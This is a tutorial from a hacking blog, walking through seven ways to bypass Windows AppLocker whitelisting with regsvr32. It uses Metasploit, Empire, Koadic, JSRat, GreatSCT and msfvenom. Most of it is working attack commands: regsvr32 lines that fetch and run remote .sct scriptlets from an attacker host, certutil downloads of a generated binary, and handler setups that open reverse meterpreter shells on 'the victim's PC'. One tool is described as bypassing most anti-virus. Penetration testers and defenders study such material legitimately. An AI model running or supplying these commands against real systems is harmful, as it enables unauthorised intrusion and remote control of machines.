Windows Exploitation: regsvr32
The purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass. As we know for security reason the system admin add group policies to restrict app execution for a local user. In our previous article, we had discussed “Windows Applocker Policy – A Beginner’s Guide” as they define the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with regsvr32.exe.
Tables of Content
- Introduction to regsvr
- Working of regsvr
- Multiple methods to attack regsvr
Introduction
Regsvr32 stands for Microsoft Register Server. It is the windows’ command-line utility tool. While regsvr32 causes problems sometimes; it’s an important file as its windows system file. The file is found in the subfolder of C:\Windows. This file is able to observe, track and influence other programs. It’s mainly used to register and unregister programs in windows file extension for this is .exe and its process widely assists OLE (Object Linking and Embedding), DLL (Data Link Libraries) and OCX (ActiveX control modules). The said process works in the background and can be seen with a task manager. Its Microsoft’s one of the trusted files.
Working
Information about programs associated with regsvr32 is added to windows when you register a DLL file in regsvr32. These defences are then accessed to understand where the program data is and how to interact with it. While registering a DLL file, information is added to central the directory so that it can be used by the windows. The whole path of these files literally has the executable code and due to these files windows can call upon specific functions. These files are very convenient as when the software is updated, these files automatically call upon the updated version; in short, it helps avoid the version problems of software. Usually, this file is not commonly used except for registering and unregistering DLL files.
RegSvr32.exe has the following command-line options:
Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>
/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls to dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes
To know more about it, visit here: //support.microsoft.com/en-us/help/249873/how-to-use-the-regsvr32-tool-and-troubleshoot-regsvr32-error-messages
Multiple Methods
- Web delivery
- Empire
- Manual
- MSFVenom
- Koadic
- JSRat
- GreatSCT
Web Delivery
This module quickly fires up a web server that serves a payload. The provided command will allow for a payload to download and execute. It will do it either through a specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection.
Regsvr32 uses the “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request a .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 3 msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set srvhost 192.168.1.109 msf exploit (web_delivery)>exploit
Copy the highlighted text shown in the image below:
Once the exploit is running; you will have a URL made for you. Run that URL in the command prompt of the Victim’s PC as shown below:
regsvr32 /s /n /u /i://http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
Once you hit enter after the command, you will have your session. Type ‘sysinfo’ for the information of the PC as shown in the image below:
PowerShell Empire
For our next method of regsvr Attack, we will use empire. Empire is a post-exploitation framework. Till now we have to pair our .sct tacks with Metasploit but in this method, we will use the empire framework. It’s solely a python-based PowerShell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from Empire
To have a basic guide of Empire, please visit our article introducing empire: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once the empire framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener, type :
uselistner http set Host http://192.168.1.109 execute
With the above commands, you will have an active listener. Type back to go out of listener so you can initiate your PowerShell.
Once you are out of the listener, you need to use an exploit to create your malicious file. A stager, in the empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. This means to create an exploit, we will have to usestager. Therefore, type :
usestager windows/launcher_sct set listener http execute
After the execution of executing the command, usestager will create a launcher.sct in /tmp. Now to get the session start the python server by typing:
python -m SimpleHTTPServer 8080
As the server is on, the only step left is to execute our malware on the victim’s PC. For this, type the following command in the command prompt :
regsvr /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
In the above command, we have used port 8080 because our server of python is activated on the same port.
Once the above is executed as told, you will receive a session. To access the session type :
interact 9ATUX4M7
9ATUX4M7: is an agent/session name. this will vary from session to session.
Inject PowerShell code in sct File (Manual Method)
Our next method manual with the help of an exploit. The exploit we will use will help us to create a powershell code. So let’s first create our powershell and for this go to the terminal of kali and type
After running this exploit, it will show you the powershell code on the terminal screen as shown in the following image :
use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 2 msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set srvhost 192.168.1.109 msf exploit (web_delivery)>exploit
Copy the highlighted text shown below:
Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.
Now we need to create a .sct file in order for our attack to run. We found a script online to create a .sct file. You can access the link for the script by clicking here. The script is shown in the image below :
Copy the PowerShell code which was created by web_delivery and paste it in the above script where it says “calc.exe” as shown in the image below and then finally save it with .sct extension.
Then just like before, run the following command to execute the .sct file with regsvr32.exe in the victim’s PC:
regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll
As soon as the above command is executed, you will have your session through web_delivery. To access the session type ‘sessions 1’ and ‘info’ to have basic information about the system.
MsfVenom
Our next method is to use msfvenom. Through this method, we will create two .sct files, one to download our malware and another to execute it. But first let’s get going with msfvenom and for that type :
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe
Startup the python server using the following command:
python -m SimpleHTTPServer 80
And simultaneously, in the same script, used in the previous method inject a certutil.exe command to call the shell.exe file from a remote server. Therefore, instead of “calc .exe” write the following and save the file again with .sct extension:
certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe
We have used certutil here as it allows to download a file in windows and also saved the file as 3.sct.
Now, run the above script using the following command:
regsvr32 /u /n /s /i:http;//192.168.1.109/3.sct scrobj.dll
We will create another file to execute our previous file “shell.exe”. For that again take the same script and where its written “calc.exe”; therefore write :
cmd /k cd c:\Users\raj & shell.exe
This we have saved the script as 4.sct and again run this script using the following command :
regsvr32 /u /n /s /i:http://192.168.1.109/4.sct scrobj.dll
Simultaneously, start up the multi handler too, to get a session. Hence, type :
use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit
After running the command in the victim’s PC, u will have a meterpreter session.
Koadic
Our next method is using Koadic. Koadic is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed article on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework
Once the koadic is up and running, type:
use stager/js/regsvr set srvhost 192.168.1.107 run
After this, type the following in the command prompt of the victim’s PC:
regsvr32 /u /n /s /i:http://192.168.1.107:9998/uWBjv scrobj.dll
Once you run the above command, you will have a session. To access the session type :
zombies 0
JSRat
Our next method of attacking regsvr32 is by using JSRat and you can download it from GitHub. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a web server and on that web server, we will find our .sct file. To use this method type:
./JSRat.py -I 192.168.1.107 -p 4444
Running the above command will start the web server.
Open this in your browser as shown below. Here, you will find the .sct file that you need to run on your victim’s PC.
As we have got the command, run the command in the run window as shown in the image below:
After executing the command in the Run window you will have a session as shown:
GreatSCT
GreatSCT is a tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from
git clone https://github.com/GreatSCT/GreatSCT
Once it’s downloaded and running, type the following command to access the modules :
use Bypass
Then type ‘list’ to get the list of modules.
List of modules will appear as shown in the image below:
From the list of modules choose the following :
use regsvr/shellcode_iject/base64_migrate.py generate
After the above commands, type 1 to choose MSFVenom
Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the given port (any) as here you can see in the image below that we have given lport as 2345
After giving the details, it will ask you a name for your malware. By default, it will set name ‘payload’ so either you can give a name or just press enter for the default settings.
And just as you press enter it will generate two files. One of them will be a resource file and others will be a .sct file.
Now, firstly, start the python’s server in /usr/share/greatsct-output by typing:
python -m SimpleHTTPServer 80
Now execute the .sct file in the run window of the victim’s PC as shown below.
Simultaneously, start the multi/handler using the resource file. For this, type :
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And you have a meterpreter session.
Conclusion
Using regsvr32 to gain a session is an unusual way but it’s very important. And so above mentioned methods uses different tools and software to allow us to perform this attack.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here